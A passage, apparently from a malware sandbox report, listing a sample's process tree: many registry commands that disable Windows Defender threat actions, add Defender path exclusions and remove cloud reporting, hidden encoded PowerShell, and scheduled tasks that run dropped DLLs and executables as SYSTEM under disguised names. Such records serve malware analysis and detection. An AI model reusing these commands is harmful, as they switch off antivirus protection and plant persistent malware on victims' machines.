/v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2204
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:4700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:323⤵PID:3172
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:324⤵
- UAC bypass
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:316
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:643⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR" /t REG_DWORD /d 0 /reg:643⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nJAAWeDPVVUn" /t REG_DWORD /d 0 /reg:323⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZHPKbjSENnMKZrVB /t REG_DWORD /d 0 /reg:323⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn /t REG_DWORD /d 0 /reg:643⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kIqALRPQQwlbskwL /t REG_DWORD /d 0 /reg:643⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kIqALRPQQwlbskwL /t REG_DWORD /d 0 /reg:323⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn /t REG_DWORD /d 0 /reg:323⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZHPKbjSENnMKZrVB /t REG_DWORD /d 0 /reg:643⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nJAAWeDPVVUn" /t REG_DWORD /d 0 /reg:643⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XdSXIRHhU" /t REG_DWORD /d 0 /reg:643⤵PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XdSXIRHhU" /t REG_DWORD /d 0 /reg:323⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqECRSyvRyPgC" /t REG_DWORD /d 0 /reg:643⤵PID:4932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqECRSyvRyPgC" /t REG_DWORD /d 0 /reg:323⤵PID:436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR" /t REG_DWORD /d 0 /reg:323⤵PID:60
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpgDPWFcb" /SC once /ST 13:10:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpgDPWFcb"2⤵PID:2364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpgDPWFcb"2⤵PID:4376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tyUrxYbocxeCOlnue" /SC once /ST 05:45:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exe\" wx /oqsite_idWKR 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:3172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tyUrxYbocxeCOlnue"2⤵PID:4384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3476
-
C:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exeC:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exe wx /oqsite_idWKR 385118 /S1⤵PID:1096
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bQqfrfOcqJXaOOvqOO"2⤵PID:2272
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2204
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4384
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4344
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XdSXIRHhU\pavAWp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "sVfPsEIPBSnpwys" /V1 /F2⤵
- Creates scheduled task(s)
PID:2244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sVfPsEIPBSnpwys2" /F /xml "C:\Program Files (x86)\XdSXIRHhU\fJNLPkY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sVfPsEIPBSnpwys"2⤵PID:5176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sVfPsEIPBSnpwys"2⤵PID:4720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yurPLWjCznwNCq" /F /xml "C:\Program Files (x86)\CZfHRXFHxTaU2\ykIeUQB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YKeQNDFprqTiy2" /F /xml "C:\ProgramData\ZHPKbjSENnMKZrVB\VjmaUYB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cZWesaImmWMWSirmA2" /F /xml "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\ZNvAarE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ioemHMgjvioeHnMgNrq2" /F /xml "C:\Program Files (x86)\QqECRSyvRyPgC\oYJwUDX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RihWzGLSFaMWbYlMN" /SC once /ST 00:56:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll\",#1 /Mfsite_idavC 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:5328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "RihWzGLSFaMWbYlMN"2⤵PID:5236
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:5756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:5436
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4728
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tyUrxYbocxeCOlnue"2⤵PID:4944
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵PID:6048
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll",#1 /Mfsite_idavC 3851181⤵PID:5188
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll",#1 /Mfsite_idavC 3851182⤵PID:5580
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RihWzGLSFaMWbYlMN"3⤵PID:5768
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:5596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Windows\it-IT\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Windows\it-IT\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AppLaunchA" /sc MINUTE /mo 11 /tr "'C:\odt\AppLaunch.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AppLaunch" /sc ONLOGON /tr "'C:\odt\AppLaunch.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AppLaunchA" /sc MINUTE /mo 10 /tr "'C:\odt\AppLaunch.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6044
-
